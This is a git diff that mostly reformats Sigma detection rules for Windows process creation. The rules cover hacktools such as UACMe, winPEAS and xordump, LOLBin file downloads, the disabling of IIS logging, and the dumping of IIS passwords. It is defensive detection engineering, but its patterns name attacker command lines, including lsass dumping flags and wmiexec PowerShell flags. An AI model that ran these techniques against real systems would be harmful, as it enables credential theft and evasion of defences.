SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a + - sha256: + - 9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956 + - fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a condition: process_creation and selection falsepositives: - Unlikely level: high + ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sysmoneop.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sysmoneop.yml index f1718649d..3c875f908 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sysmoneop.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sysmoneop.yml @@ -22,12 +22,12 @@ detection: selection_img: Image|endswith: \SysmonEOP.exe selection_hash: - - Hashes: - - IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5 - - IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC - - Imphash: - - 22f4089eb8aba31e1bb162c6d9bf72e5 - - 5123fa4c4384d431cd0d893eeb49bbec + - Hashes: + - IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5 + - IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC + - Imphash: + - 22f4089eb8aba31e1bb162c6d9bf72e5 + - 5123fa4c4384d431cd0d893eeb49bbec condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_trufflesnout.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_trufflesnout.yml index 9e583bede..5a99f3ba8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_trufflesnout.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_trufflesnout.yml @@ -1,8 +1,7 @@ title: HackTool - TruffleSnout Execution id: 69ca006d-b9a9-47f5-80ff-ecd4d25d481a status: test -description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit - for offensive operators, situational awareness and targeted low noise enumeration. +description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration. references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md - https://github.com/dsnezhkov/TruffleSnout @@ -22,8 +21,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: TruffleSnout.exe - - Image|endswith: \TruffleSnout.exe + - OriginalFileName: TruffleSnout.exe + - Image|endswith: \TruffleSnout.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_uacme.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_uacme.yml index bb6fbd055..84e0a9414 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_uacme.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_uacme.yml @@ -1,8 +1,7 @@ title: HackTool - UACMe Akagi Execution id: d38d2fa4-98e6-4a24-aff1-410b0c9ad177 status: test -description: Detects the execution of UACMe, a tool used for UAC bypasses, via default - PE metadata +description: Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems) @@ -21,19 +20,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_pe: - - Product: UACMe - - Company: - - REvol Corp - - APT 92 - - UG North - - Hazardous Environments - - CD Project Rekt - - Description: - - UACMe main module - - Pentesting utility - - OriginalFileName: - - Akagi.exe - - Akagi64.exe + - Product: UACMe + - Company: + - REvol Corp + - APT 92 + - UG North + - Hazardous Environments + - CD Project Rekt + - Description: + - UACMe main module + - Pentesting utility + - OriginalFileName: + - Akagi.exe + - Akagi64.exe selection_img: Image|endswith: - \Akagi64.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_wce.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_wce.yml index 9cf413e28..dacc68864 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_wce.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_wce.yml @@ -20,14 +20,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - - Imphash: - - a53a02b997935fd8eedcb5f7abab9b9f - - e96a73c7bf33a464c510ede582318bf2 - - Hashes|contains: - - IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f - - IMPHASH=e96a73c7bf33a464c510ede582318bf2 + - Imphash: + - a53a02b997935fd8eedcb5f7abab9b9f + - e96a73c7bf33a464c510ede582318bf2 + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f + - IMPHASH=e96a73c7bf33a464c510ede582318bf2 selection_2: - CommandLine|endswith: .exe -S + CommandLine|endswith: .exe -S ParentImage|endswith: \services.exe filter: Image|endswith: \clussvc.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_winpeas.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_winpeas.yml index 5880ed172..e31913064 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_winpeas.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_winpeas.yml @@ -1,8 +1,7 @@ title: HackTool - winPEAS Execution id: 98b53e78-ebaf-46f8-be06-421aafd176d9 status: experimental -description: WinPEAS is a script that search for possible paths to escalate privileges - on Windows hosts. The checks are explained on book.hacktricks.xyz +description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz references: - https://github.com/carlospolop/PEASS-ng - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation @@ -23,29 +22,29 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: winPEAS.exe - - Image|endswith: - - \winPEASany_ofs.exe - - \winPEASany.exe - - \winPEASx64_ofs.exe - - \winPEASx64.exe - - \winPEASx86_ofs.exe - - \winPEASx86.exe + - OriginalFileName: winPEAS.exe + - Image|endswith: + - \winPEASany_ofs.exe + - \winPEASany.exe + - \winPEASx64_ofs.exe + - \winPEASx64.exe + - \winPEASx86_ofs.exe + - \winPEASx86.exe selection_cli_option: - CommandLine|contains: - - ' applicationsinfo' - - ' browserinfo' - - ' eventsinfo' - - ' fileanalysis' - - ' filesinfo' - - ' processinfo' - - ' servicesinfo' - - ' windowscreds' + CommandLine|contains: + - ' applicationsinfo' # Search installed applications information + - ' browserinfo' # Search browser information + - ' eventsinfo' # Display interesting events information + - ' fileanalysis' # Search specific files that can contains credentials and for regexes inside files + - ' filesinfo' # Search generic files that can contains credentials + - ' processinfo' # Search processes information + - ' servicesinfo' # Search services information + - ' windowscreds' # Search windows credentials selection_cli_dl: - CommandLine|contains: https://github.com/carlospolop/PEASS-ng/releases/latest/download/ + CommandLine|contains: https://github.com/carlospolop/PEASS-ng/releases/latest/download/ selection_cli_specific: - - ParentCommandLine|endswith: ' -linpeas' - - CommandLine|endswith: ' -linpeas' + - ParentCommandLine|endswith: ' -linpeas' + - CommandLine|endswith: ' -linpeas' condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_winpwn.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_winpwn.yml index a314f2cf1..b15b4b619 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_winpwn.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_winpwn.yml @@ -1,13 +1,11 @@ title: HackTool - WinPwn Execution id: d557dc06-62e8-4468-a8e8-7984124908ce related: - - id: 851fd622-b675-4d26-b803-14bc7baa517a - type: similar + - id: 851fd622-b675-4d26-b803-14bc7baa517a + type: similar status: experimental -description: 'Detects commandline keywords indicative of potential usge of the tool - WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. - - ' +description: | + Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. author: Swachchhanda Shrawan Poudel date: 2023/12/04 references: @@ -39,7 +37,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - Offline_Winpwn - 'WinPwn ' - WinPwn.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml index 1d6809db6..ebf5f39f1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml @@ -1,8 +1,7 @@ title: HackTool - Wmiexec Default Powershell Command id: 022eaba8-f0bf-4dd9-9217-4604b0bb3bb0 status: experimental -description: Detects the execution of PowerShell with a specific flag sequence that - is used by the Wmiexec script +description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script references: - https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py author: Nasreddine Bencherchali (Nextron Systems) @@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc + CommandLine|contains: -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_xordump.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_xordump.yml index 7d3efea67..63a9aa75c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_xordump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_xordump.yml @@ -20,12 +20,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \xordump.exe - - CommandLine|contains: - - ' -process lsass.exe ' - - ' -m comsvcs ' - - ' -m dbghelp ' - - ' -m dbgcore ' + - Image|endswith: \xordump.exe + - CommandLine|contains: + - ' -process lsass.exe ' + - ' -m comsvcs ' + - ' -m dbghelp ' + - ' -m dbgcore ' condition: process_creation and selection falsepositives: - Another tool that uses the command line switches of XORdump diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_zipexec.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_zipexec.yml index 226ca8503..fb87c2b82 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_zipexec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_zipexec.yml @@ -1,8 +1,7 @@ title: Suspicious ZipExec Execution id: 90dcf730-1b71-4ae7-9ffc-6fcf62bd0132 status: test -description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into - a password-protected zip file. +description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. references: - https://twitter.com/SBousseaden/status/1451237393017839616 - https://github.com/Tylous/ZipExec @@ -23,13 +22,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational run: - CommandLine|contains|all: + CommandLine|contains|all: - /generic:Microsoft_Windows_Shell_ZipFolder:filename= - .zip - '/pass:' - '/user:' delete: - CommandLine|contains|all: + CommandLine|contains|all: - /delete - Microsoft_Windows_Shell_ZipFolder:filename= - .zip diff --git a/sigma/sysmon/process_creation/proc_creation_win_hwp_exploits.yml b/sigma/sysmon/process_creation/proc_creation_win_hwp_exploits.yml index 41a72c2de..150673c16 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hwp_exploits.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hwp_exploits.yml @@ -1,8 +1,7 @@ title: Suspicious HWP Sub Processes id: 023394c4-29d5-46ab-92b8-6a534c6f447b status: test -description: Detects suspicious Hangul Word Processor (Hanword) sub processes that - could indicate an exploitation +description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation references: - https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/ - https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1 diff --git a/sigma/sysmon/process_creation/proc_creation_win_hxtsr_masquerading.yml b/sigma/sysmon/process_creation/proc_creation_win_hxtsr_masquerading.yml index ca6324bde..3f53c5402 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hxtsr_masquerading.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hxtsr_masquerading.yml @@ -1,18 +1,11 @@ title: Fake Instance Of Hxtsr.exe id: 4e762605-34a8-406d-b72e-c1a089313320 status: test -description: 'HxTsr.exe is a Microsoft compressed executable file called Microsoft - Outlook Communications. - - HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" - subfolder of "C:\Program Files". - +description: | + HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. + HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Its path includes a version number, e.g., "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\HxTsr.exe". - - Any instances of hxtsr.exe not in this folder may be malware camouflaging itself - as HxTsr.exe - - ' + Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe author: Sreeman date: 2020/04/17 modified: 2023/02/21 diff --git a/sigma/sysmon/process_creation/proc_creation_win_icacls_deny.yml b/sigma/sysmon/process_creation/proc_creation_win_icacls_deny.yml index 7c0297a2a..44da29e2e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_icacls_deny.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_icacls_deny.yml @@ -1,8 +1,7 @@ title: Use Icacls to Hide File to Everyone id: 4ae81040-fc1c-4249-bfa3-938d260214d9 status: test -description: Detect use of icacls to deny access for everyone in Users folder sometimes - used to hide malicious files +description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files references: - https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/ author: frack113 @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_icacls: - - OriginalFileName: iCACLS.EXE - - Image|endswith: \icacls.exe - selection_cmd: - CommandLine|contains|all: + - OriginalFileName: iCACLS.EXE + - Image|endswith: \icacls.exe + selection_cmd: # icacls "C:\Users\admin\AppData\Local\37f92fe8-bcf0-4ee0-b8ba-561f797f5696" /deny *S-1-1-0:(OI)(CI)(DE,DC) + CommandLine|contains|all: - C:\Users\ - /deny - '*S-1-1-0:' diff --git a/sigma/sysmon/process_creation/proc_creation_win_ieexec_download.yml b/sigma/sysmon/process_creation/proc_creation_win_ieexec_download.yml index a4d9abf0d..7b9393af6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ieexec_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ieexec_download.yml @@ -19,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \IEExec.exe - - OriginalFileName: IEExec.exe + - Image|endswith: \IEExec.exe + - OriginalFileName: IEExec.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_http_logging.yml b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_http_logging.yml index 904612f8a..6508642de 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_http_logging.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_http_logging.yml @@ -1,8 +1,7 @@ title: Disable Windows IIS HTTP Logging id: e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e status: test -description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group - 3390 (Bronze Union) +description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging author: frack113 @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - Image|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - set - config - section:httplogging diff --git a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml index 822da1dcb..0c1b03b24 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml @@ -1,8 +1,7 @@ title: Microsoft IIS Service Account Password Dumped id: 2d3cdeec-c0db-45b4-aa86-082f7eb75701 status: test -description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, - being used to list passwords +description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords references: - https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html - https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA @@ -22,30 +21,31 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_base_name: - - Image|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - Image|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_base_list: - CommandLine|contains: 'list ' + CommandLine|contains: 'list ' selection_standalone: - CommandLine|contains: - - ' /config' + CommandLine|contains: + - ' /config' # https://pbs.twimg.com/media/FgydDAJWIAEio34?format=png&name=900x900 - ' /xml' + # We cover the "-" version just in case :) - ' -config' - ' -xml' selection_cmd_flags: - CommandLine|contains: - - ' /@t' + CommandLine|contains: + - ' /@t' # Covers both "/@text:*" and "/@t:*" - ' /text' - ' /show' + # We cover the "-" version just in case :) - ' -@t' - ' -text' - ' -show' selection_cmd_grep: - CommandLine|contains: + CommandLine|contains: - :\* - password - condition: process_creation and (all of selection_base_* and (selection_standalone - or all of selection_cmd_*)) + condition: process_creation and (all of selection_base_* and (selection_standalone or all of selection_cmd_*)) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml index 2ca8c61ef..267d7bd21 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml @@ -20,20 +20,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - Image|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - install - module - CommandLine|contains: + CommandLine|contains: - '/name:' - '-name:' filter_iis_setup: ParentImage: C:\Windows\System32\inetsrv\iissetup.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Unknown as it may vary from organisation to organisation how admins use to install - IIS modules + - Unknown as it may vary from organisation to organisation how admins use to install IIS modules level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml index 57d41269e..c418bc9f3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml @@ -1,9 +1,7 @@ title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd id: 7c8af9b2-dcae-41a2-a9db-b28c288b5f08 status: test -description: Detects usage of "appcmd" to create new global URL rewrite rules. This - behaviour has been observed being used by threat actors to add new rules so they - can access their webshells. +description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells. references: - https://twitter.com/malmoeb/status/1616702107242971144 - https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r @@ -20,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - Image|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - set - config - section:system.webServer/rewrite/globalRules diff --git a/sigma/sysmon/process_creation/proc_creation_win_iis_connection_strings_decryption.yml b/sigma/sysmon/process_creation/proc_creation_win_iis_connection_strings_decryption.yml index 10f482744..606f6ded1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_iis_connection_strings_decryption.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_iis_connection_strings_decryption.yml @@ -1,10 +1,7 @@ title: Microsoft IIS Connection Strings Decryption id: 97dbf6e2-e436-44d8-abee-4261b24d3e41 status: test -description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. - An attacker with Microsoft IIS web server access via a webshell or alike can decrypt - and dump any hardcoded connection strings, such as the MSSQL service account password - using aspnet_regiis command. +description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. references: - https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html author: Tim Rauch @@ -22,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_name: - - Image|endswith: \aspnet_regiis.exe - - OriginalFileName: aspnet_regiis.exe + - Image|endswith: \aspnet_regiis.exe + - OriginalFileName: aspnet_regiis.exe selection_args: - CommandLine|contains|all: + CommandLine|contains|all: - connectionStrings - ' -pdf' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_iis_susp_module_registration.yml b/sigma/sysmon/process_creation/proc_creation_win_iis_susp_module_registration.yml index 26618afd1..fc570742f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_iis_susp_module_registration.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_iis_susp_module_registration.yml @@ -1,8 +1,7 @@ title: Suspicious IIS Module Registration id: 043c4b8b-3a54-4780-9682-081cb6b8185c status: test -description: Detects a suspicious IIS module registration as described in Microsoft - threat report on IIS backdoors +description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors references: - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ author: Florian Roth (Nextron Systems), Microsoft (idea) @@ -22,12 +21,12 @@ detection: selection_parent: ParentImage|endswith: \w3wp.exe selection_cli_1: - CommandLine|contains: appcmd.exe add module + CommandLine|contains: appcmd.exe add module selection_cli_2: - CommandLine|contains: ' system.enterpriseservices.internal.publish' + CommandLine|contains: ' system.enterpriseservices.internal.publish' Image|endswith: \powershell.exe selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - gacutil - ' /I' condition: process_creation and (selection_parent and 1 of selection_cli_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml b/sigma/sysmon/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml index dd3d51d2c..c7b96f2fc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml @@ -1,8 +1,7 @@ title: ImagingDevices Unusual Parent/Child Processes id: f11f2808-adb4-46c0-802a-8660db50fa99 status: test -description: Detects unusual parent or children of the ImagingDevices.exe (Windows - Contacts) process as seen being used with Bumblebee activity +description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ author: Nasreddine Bencherchali (Nextron Systems) @@ -21,11 +20,13 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_parent: ParentImage|endswith: + # Add more if known - \WmiPrvSE.exe - \svchost.exe - \dllhost.exe Image|endswith: \ImagingDevices.exe selection_child: + # You can add specific suspicious child processes (such as cmd, powershell...) to increase the accuracy ParentImage|endswith: \ImagingDevices.exe condition: process_creation and (1 of selection_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_imewbdld_download.yml b/sigma/sysmon/process_creation/proc_creation_win_imewbdld_download.yml index d0a68a548..5ebf7ebc1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_imewbdld_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_imewbdld_download.yml @@ -1,8 +1,8 @@ title: Arbitrary File Download Via IMEWDBLD.EXE id: 863218bd-c7d0-4c52-80cd-0a96c09f54af related: - - id: 8d7e392e-9b28-49e1-831d-5949c6281228 - type: derived + - id: 8d7e392e-9b28-49e1-831d-5949c6281228 + type: derived status: experimental description: Detects usage of "IMEWDBLD.exe" to download arbitrary files references: @@ -23,14 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \IMEWDBLD.exe - - OriginalFileName: imewdbld.exe + - Image|endswith: \IMEWDBLD.exe + - OriginalFileName: imewdbld.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) falsepositives: - Unknown +# Note: Please reduce this to medium if you find legitimate use case of this utility with a URL level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml b/sigma/sysmon/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml index b873ff053..a047fbc85 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml @@ -1,8 +1,7 @@ title: InfDefaultInstall.exe .inf Execution id: ce7cf472-6fcc-490a-9481-3786840b5d9b status: test -description: Executes SCT script using scrobj.dll from a command in entered into a - specially prepared INF file. +description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution - https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/ @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'InfDefaultInstall.exe ' - '.inf' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_installutil_download.yml b/sigma/sysmon/process_creation/proc_creation_win_installutil_download.yml index 479507381..80ad079d7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_installutil_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_installutil_download.yml @@ -1,10 +1,8 @@ title: File Download Via InstallUtil.EXE id: 75edd216-1939-4c73-8d61-7f3a0d85b5cc status: test -description: 'Detects use of .NET InstallUtil.exe in order to download arbitrary files. - The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" - - ' +description: | + Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" references: - https://github.com/LOLBAS-Project/LOLBAS/pull/239 author: Nasreddine Bencherchali (Nextron Systems) @@ -22,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \InstallUtil.exe - - OriginalFileName: InstallUtil.exe + - Image|endswith: \InstallUtil.exe + - OriginalFileName: InstallUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_instalutil_no_log_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_instalutil_no_log_execution.yml index 0abc749e3..0d132e851 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_instalutil_no_log_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_instalutil_no_log_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Execution of InstallUtil Without Log id: d042284c-a296-4988-9be5-f424fadcc28c status: test -description: Uses the .NET InstallUtil.exe application in order to execute image without - log +description: Uses the .NET InstallUtil.exe application in order to execute image without log references: - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/ - https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool @@ -22,7 +21,7 @@ detection: selection: Image|endswith: \InstallUtil.exe Image|contains: Microsoft.NET\Framework - CommandLine|contains|all: + CommandLine|contains|all: - '/logfile= ' - /LogToConsole=false condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_java_keytool_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_java_keytool_susp_child_process.yml index 464390f71..0e3cb16cc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_java_keytool_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_java_keytool_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Shells Spawn by Java Utility Keytool id: 90fb5e62-ca1f-4e22-b42e-cc521874c938 status: test -description: Detects suspicious shell spawn from Java utility keytool process (e.g. - adselfservice plus exploitation) +description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus 